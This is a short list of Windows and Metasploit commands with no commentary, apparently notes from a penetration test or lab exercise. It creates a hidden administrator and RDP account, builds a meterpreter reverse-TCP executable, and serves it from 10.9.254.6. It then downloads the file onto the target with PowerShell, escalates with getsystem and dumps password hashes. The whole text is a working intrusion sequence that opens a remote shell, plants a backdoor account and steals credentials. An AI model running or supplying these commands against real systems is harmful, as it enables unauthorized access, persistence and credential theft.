net user pentest Pen.TE$t2024!1 /ADD
net localgroup "Remote Desktop Users" pentest /add
net localgroup "Administrators" pentest /add
use payload/windows/meterpreter/reverse_tcp
set lhost=10.9.254.6
set lport=8888
generate -f exe -o /var/www/html/meterpreter.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.9.254.6
set lport 8888
run
$URL="http://10.9.254.6/meterpreter.exe"
$Path="C:\Users\pentest\meterpreter.exe"
Invoke-WebRequest -URI $URL -OutFile $Path
meterpreter> getsystem
meterpreter> hashdump